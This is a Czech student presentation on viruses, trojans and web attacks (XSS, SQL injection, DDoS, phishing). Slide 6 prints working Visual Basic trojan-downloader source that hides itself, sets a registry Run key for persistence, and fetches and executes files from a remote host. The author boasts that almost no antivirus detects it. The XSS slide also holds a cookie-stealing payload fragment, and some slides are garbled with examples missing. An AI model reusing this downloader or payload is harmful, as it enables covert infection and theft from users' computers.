Mironov Nikita 1A/4. Počítačové viry/trojany Web-hacking. - презентация

1 Mironov Nikita 1A/4

2 Počítačové viry/trojany Web-hacking

3 všechny virusy dělíme na spyware, trojany, backdoor'y spyware je špionský program,ktery má za úkol ukrást od vás informace trojan je program,který vám škodí backdoor je program pomoci kterého hacker může ovládat váš počítač

4 -casto trojan se může dostat na váš počítač protože máte díry ve windowsu -pro zavření těchto dir musíte pořád stahovat obnovení z update.microsoft.com -take škodlivý program může prolézt k vám protože máte otevřené tzv. porty -pro případ s portami používejte firewall (napr.Outpost Firewall) -samozřejmě nejčastějším případem stále je stahování programu z nějakých stránek/pošty

5 -viry dělají hodně zkušení lidé (virusmakery) a proto antiviry casto nemohou najit/odstranit vir -neexistuje nejlepší antivir protože každý má svoje plusy a minusy -mezi dobré patří Kasperský Antivirus,NOD32,Symantec Norton Antivirus

6 -příklad kódu virusu,ktery byl nalezen jenom 2-má ze 33 antivirusu,obsahuje jenom 60 řádku ;) -stále není v databazích antiviru (!POZOR!) Private Sub Form_Load() On Error GoTo errsquad App.TaskVisible = False Shell ("cmd /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Windows\svchost.exe /f") Open "c:\windows\system32\mstdarg.dll" For Input As #2 Line Input #2, hostaddr Close #2 Open "c:\windows\system32\mstddrg.dll" For Output As #5 Print #5, Inet1.OpenURL(hostaddr & "/" & "nameofscr.file") Close #5 Open "c:\windows\system32\mstddrg.dll" For Input As #6 Line Input #6, nameofscr Close #6 Timer1.Interval = "10000" Timer1.Enabled = True Exit Sub errsquad: kool = 1 End Sub Private Sub Timer1_Timer() On Error GoTo errdamage Dim kool Open "c:\windows\system32\mstddrg.dll" For Output As #9 Print #9, Inet1.OpenURL(hostaddr & "/" & "nameofscr.file") Close #9 Open "c:\windows\system32\mstddrg.dll" For Input As #10 Line Input #10, nameofscr Close #10 Open "c:\windows\system32\mstdnrg.dll" For Output As #15 Print #15, Inet1.OpenURL(hostaddr & "/" & "not.file") Close #15 Open "c:\windows\system32\mstdnrg.dll" For Input As #16 Line Input #16, notfile Close #16 Open "c:\windows\system32\mstdlrg.dll" For Output As #17 Print #17, Inet1.OpenURL(hostaddr & "/" & "end.file") Close #17 Open "c:\windows\system32\mstdlrg.dll" For Input As #18 Line Input #18, endfors Close #18 If endfors = 1 Then End Open "c:\windows\cursors\" & nameofscr For Output As #1 Print #1, Inet1.OpenURL(hostaddr & "/" & nameofscr) Close #1 If notfile = 1 Then kool = 1 Else Shell ("c:\windows\cursors\" & nameofscr) End If Exit Sub errdamage: kool = 0 End Sub

7 Úvod: Co všechno děláme přes internet? Stahujeme,díváme se na filmy a videa,hrajeme hry,nakupujeme,navštěvujeme naše oblíbené stránky,chatujeme,píšeme dopisy,posilame soukromou informaci... Samozřejmě že každá normální stránka požaduje registraci uživatele aby mohla pak každého identifikovat. A proto na každém servru je tzv. Uživatelská databáze...

8 Metod útoku na web stránky je hodně.A proto dnes vám popíšu jenom základni: XSS - Cross Site Scripting, nejrozšířenější metoda,která je užívána na základě chyb skriptu web-stranky SQL-Injection - také hodně rozšířena metoda,na základě sestavení speciálního 'dotazu' k bazi SQL DDoS - nejstarši metoda.Její smysl je v tom,že na jeden server se připojili najednou vic nez lidi (BOTu) Phishing - nová metoda,hacker dělá "kopii" nějaké stránky a mění jenom to,kam půjdou soukromá data.

9 XSS - Cross Site Scripting Každá stránka obsahuje HTML kód.Tento kód generuje speciálni skript na servere. Samozřejmě,že generace kódů je na základě našeho dotazu k serveru. Příklad: To byl jen příklad a google má proti tomu obranu => nepokoušejte se to opakovat Píšeme v Googlu text a hledáme - náš text je dotaz k serveru Skript na googlu vrací nám stránku s výsledky Na této stránce je hodně krát napsán náš "dotaz" => náš text byl přidán do zdrojového kódu Nám stačí napsat něco jako > alert(document.cookie) a už máme heslo a jméno uživatele. náš text byl přidán do zdrojového kódu Nám stačí napsat něco jako > alert(document.cookie) a už máme heslo a jméno uživatele.">

10 SQL-injection - Structure Query Language Injection Všechna data jsou uložena v SQL-databazich (99% stranek). Aby ji jsme dostali musíme najít aspoň něco na stránce,co bude také otevírat tu bazi Příklad: Tady je příklad připojení k SQL,zkusíme ho modifikovat: Pak musíme zkoušet názvy sloupců v této bázi a pokud najdeme správný název -> máme přístup k účtům uživatele

11 DDoS - Denial Of Service. Tady není co popisovat,všechno je jednoduché...ale DRAHÉ :) Tato metoda je založená na principu připojení 100 počitačů k Jednomu serveru Příklad: Drahý je protože 100 počítačů nemá zdaleka každý Václav má server, Petr ma hodně počítačů nebo svůj botnet (~100 pc) Petr otevíra na každém počítači stranku a porad stiskne "Obnovit" Takže jestli Petr obnoví stránku 30 krát za minutu na 100 počítačích bude to dotazů za minutu (musíme krátit 10ti) Za hodinu to bude dotazů.Pokud Václav má hodně pevný server,tak server bude na několik hodin offline. Pokud Václav má obyčejný počítač tak ten počítac může zhořet kvůli velkému proudu "dotazů"

12 Phishing - od angl. slova Fishing (rybaření) Máte účet v bance? Máte k němu přístup přes internet? Jste nezkušeny uživatel? Příklad phishingu: Hacker vytváří stránku,která je úplně stejná jako stránka banky. Hacker posílá dopis nezkušenému uživateli přes "Dobrý Den pane X založil jste účet na a musíte ho aktivovat přihlášením na Děkuji za pozornost" Jestli uživatel napíše svoje data (login a heslo) na stránce phishingu tak data dostane hacker,ne banka

13